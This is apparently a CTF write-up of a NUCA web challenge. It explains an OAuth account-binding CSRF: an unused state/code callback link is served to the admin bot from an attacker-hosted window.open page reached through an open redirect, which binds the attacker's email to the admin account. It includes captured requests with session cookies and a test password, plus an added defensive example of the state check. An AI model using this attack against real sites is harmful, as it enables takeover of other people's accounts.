http://106.75.66.211:8000/main/login?next=/main/post
I only found out this evening that the NUCA competition was on. I got hold of an account, had a quick look around, and looked at one blog challenge, which I am writing up here. By the end the approach was clear, but I did not finish it before the competition ended. I really feel I am getting old and can no longer keep up with CTF; thinking back on the nerve-wracking scene at last year's NUCA final.... This is already the third CTF, and for one reason or another the time I can spend on it keeps shrinking. I am no longer suited to playing CTF....
Let me write it down:
There is a registration page:
http://106.75.66.211:8000/main/register
There is a login page:
http://106.75.66.211:8000/main/login
There is a page involving CSRF:
http://106.75.66.211:8000/main/login?next=/main/index
There is a third-party authorization login:
http://106.75.66.211:8888/oauth?client_id=3f66bf84f42fec8fd6348593ab74db04&redirect_uri=http%3A%2f%2f106.75.66.211:8000%2fmain%2foauth%2f&scope=user&response_type=code
First I registered a user at http://106.75.66.211:8888/
Then I logged in and captured the request, getting:
GET /oauth?client_id=3f66bf84f42fec8fd6348593ab74db04&redirect_uri=http%3A%2f%2f106.75.66.211:8000%2fmain%2foauth%2f&scope=user&response_type=code HTTP/1.1
Host: 106.75.66.211:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://106.75.66.211:8000/main/login?next=/main/index
Connection: close
Cookie: PHPSESSID=9g0mcsl3vrkdoikcscds18su10; session=.eJw9kMGKwkAQRH9lmbMHnSR7CHhQskqE7qD0GHoughode5xdSJQ1I_77Bg97qsurB1VPtTu1TedUfmvvzUjtLkeVP9XHXuWKyWRYrwJr6JHWKVPZszYpCycYSs3RZLaGHuLcVbX1WNsrysaxQGJllgANPfnKbNgGO_CDIwE5J7Y2D6RrQIJJVVjPYSsYrUBheqZ5gLAeg15cLK0EllvP2rpqSKDywXSIgycOvOfaaIyQYTGbqtdIHbr2tLv9-Ob7fwKSE6TDBJYbbwsnrMusKhaeZROAzC_L0YEGjeJ7oHOGkVNYT9-6e9e07zvUZPyZqtcfcARhYg.W_l1hA.ZaBskzR4gtxIw-MZ9Nbx-fyEKiY
Upgrade-Insecure-Requests: 1
It requires entering the third-party email and password; click Authorize, and the captured request is as follows:
POST /oauth?client_id=3f66bf84f42fec8fd6348593ab74db04&redirect_uri=http%3A%2f%2f106.75.66.211:8000%2fmain%2foauth%2f&scope=user&response_type=code HTTP/1.1
Host: 106.75.66.211:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://106.75.66.211:8888/oauth?client_id=3f66bf84f42fec8fd6348593ab74db04&redirect_uri=http%3A%2f%2f106.75.66.211:8000%2fmain%2foauth%2f&scope=user&response_type=code
Content-Type: application/x-www-form-urlencoded
Content-Length: 138
Connection: close
Cookie: PHPSESSID=9g0mcsl3vrkdoikcscds18su10; session=.eJw9kMGKwkAQRH9lmbMHnSR7CHhQskqE7qD0GHoughode5xdSJQ1I_77Bg97qsurB1VPtTu1TedUfmvvzUjtLkeVP9XHXuWKyWRYrwJr6JHWKVPZszYpCycYSs3RZLaGHuLcVbX1WNsrysaxQGJllgANPfnKbNgGO_CDIwE5J7Y2D6RrQIJJVVjPYSsYrUBheqZ5gLAeg15cLK0EllvP2rpqSKDywXSIgycOvOfaaIyQYTGbqtdIHbr2tLv9-Ob7fwKSE6TDBJYbbwsnrMusKhaeZROAzC_L0YEGjeJ7oHOGkVNYT9-6e9e07zvUZPyZqtcfcARhYg.W_l2Hg.ZdJGqOlbJKvakfGINDRuQIgcClk
Upgrade-Insecure-Requests: 1
csrf_token=1543078958%23%23a94277a01963de74cbcd5118092d0ba474c14bf0&email=1146607%40qq.com&password=fangzhang&submit=%E6%8E%88+++%E6%9D%83
Now the key part:
GET /main/oauth/?state=eSIoXSEPz4&code=ONX9fmIHuiG7nXe2yINCgTmjXV2QwYIrU3gSFx7q HTTP/1.1
Host: 106.75.66.211:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://106.75.66.211:8888/oauth?client_id=3f66bf84f42fec8fd6348593ab74db04&redirect_uri=http%3A%2f%2f106.75.66.211:8000%2fmain%2foauth%2f&scope=user&response_type=code
Connection: close
Cookie: PHPSESSID=9g0mcsl3vrkdoikcscds18su10; session=.eJw9kMGKwkAQRH9lmbMHnSR7CHhQskqE7qD0GHoughode5xdSJQ1I_77Bg97qsurB1VPtTu1TedUfmvvzUjtLkeVP9XHXuWKyWRYrwJr6JHWKVPZszYpCycYSs3RZLaGHuLcVbX1WNsrysaxQGJllgANPfnKbNgGO_CDIwE5J7Y2D6RrQIJJVVjPYSsYrUBheqZ5gLAeg15cLK0EllvP2rpqSKDywXSIgycOvOfaaIyQYTGbqtdIHbr2tLv9-Ob7fwKSE6TDBJYbbwsnrMusKhaeZROAzC_L0YEGjeJ7oHOGkVNYT9-6e9e07zvUZPyZqtcfcARhYg.W_l2gw.fKu_sSqB7zDWUPCUUnmST4MSz3A
Upgrade-Insecure-Requests: 1
We get a state and a code. It appears that once this URL is visited the authorization succeeds, and on success the username is bound to the email. This is where the vulnerability lies:
One account can be bound to multiple third-party emails.
After logging in, there is a place to submit a vulnerability report, and it says the administrator will visit it.
So: get the third-party account I registered bound to the administrator's account. Make the administrator visit the link just generated that carries the state and code, then log in with my own third-party username and password; my email is now bound to the administrator's account, and I have admin privileges.
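As an added example (not part of the original writeup and not the challenge's code), here is what the missing check looks like on the relying-party side. A callback handler should only honour a code if the accompanying state was minted in the same browser session that started the flow, so a state/code pair generated in one person's session cannot be consumed in someone else's. The vulnerable form, which binds whatever email the code resolves to, is shown next to the hardened one so the difference is visible. All names here (begin_oauth, handle_callback, vulnerable_callback, BINDINGS, constructed_provider) and the sample data are assumptions made for the example; the challenge's real storage and provider exchange are not shown on the page.

```python
import hmac
import secrets

# Constructed stand-in for the site's binding table (third-party email -> local user).
# Assumption: the challenge's real storage layout is not shown on the page.
BINDINGS = {}


def constructed_provider(code):
    """Constructed stand-in for exchanging the code with the provider on :8888 and
    reading back the third-party email. Returns None for an unknown code."""
    return {"CODE-FROM-ATTACKER-FLOW": "attacker@example.com"}.get(code)


def vulnerable_callback(session, _state, code, lookup_email):
    """The behaviour the writeup describes: the state parameter is ignored, and the
    email behind the code is bound to whichever logged-in session follows the link."""
    email = lookup_email(code)
    if email is None:
        return False, "code rejected by provider"
    BINDINGS[email] = session["user"]
    return True, "bound"


def begin_oauth(session):
    """Start the flow for the logged-in user: mint a random single-use state and
    remember it, together with who started the flow, in this session only."""
    state = secrets.token_urlsafe(32)
    session["oauth_state"] = state
    session["oauth_user"] = session["user"]
    return state


def handle_callback(session, state, code, lookup_email):
    """Hardened callback: the code is honoured only if this very session holds a
    pending state equal to the one in the URL, for the same user, and the
    third-party account is not already bound to someone else."""
    expected = session.pop("oauth_state", None)   # single use, even when the check fails
    started_by = session.pop("oauth_user", None)
    if expected is None or state is None:
        return False, "no authorization pending in this session"
    # Compare as bytes: compare_digest rejects non-ASCII str, and a URL value may be anything.
    if not hmac.compare_digest(expected.encode(), state.encode()):
        return False, "state does not match this session"
    if started_by != session.get("user"):
        return False, "flow was started by a different user"
    email = lookup_email(code)
    if email is None:
        return False, "code rejected by provider"
    if BINDINGS.get(email, session["user"]) != session["user"]:
        return False, "third-party account already bound to another user"
    BINDINGS[email] = session["user"]
    return True, "bound"


def replay_scenario(callback):
    """Replay the writeup's scenario against a callback implementation: the attacker
    starts the flow in their own session, withholds the callback request, and the
    admin's session receives that state/code instead.
    Returns (admin_callback_accepted, user_now_bound_to_attacker_email)."""
    BINDINGS.clear()
    attacker = {"user": "attacker"}
    admin = {"user": "admin"}
    state = begin_oauth(attacker)              # state lives in the attacker's session only
    accepted, _reason = callback(admin, state, "CODE-FROM-ATTACKER-FLOW", constructed_provider)
    return accepted, BINDINGS.get("attacker@example.com")


def legit_scenario():
    """The honest path: the same session that started the flow completes it."""
    BINDINGS.clear()
    user = {"user": "attacker"}
    state = begin_oauth(user)
    accepted, _reason = handle_callback(user, state, "CODE-FROM-ATTACKER-FLOW", constructed_provider)
    return accepted, BINDINGS.get("attacker@example.com")


if __name__ == "__main__":
    print("vulnerable:", replay_scenario(vulnerable_callback))   # admin ends up bound
    print("hardened:  ", replay_scenario(handle_callback))       # rejected, nothing bound
    print("legit:     ", legit_scenario())                       # own session completes fine
```

The state is popped from the session before it is compared, so a failed attempt cannot be retried with the same value, and the comparison is constant-time. The binding-uniqueness check is a second layer: even if a state check were bypassed, an email already tied to one local account could not be re-attached to another.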
Register a third-party account
Register an account on the target site
Bind the third-party account
Enter your own third-party email and password
Generate the verification link
Save the Location obtained (note: do not visit it; drop it in Burp's proxy):
http://106.75.66.211:8000/main/oauth/?state=L3TY0uHc3B&code=nICeZTIif50fgliGcPV3bG64PqpUPNqD3oOyIXgu
On a remote host, construct the following page:
<html>
<script>window.open('http://106.75.66.211:8000/main/oauth/?state=L3TY0uHc3B&code=nICeZTIif50fgliGcPV3bG64PqpUPNqD3oOyIXgu')</script>
</html>
Convert the remote host's domain + path into a short link and submit it on the page:
http://106.75.66.211:8000/main/login?next=http://0x9.me/u3VXM
After the bot visits it, log in with the third-party email and get the flag.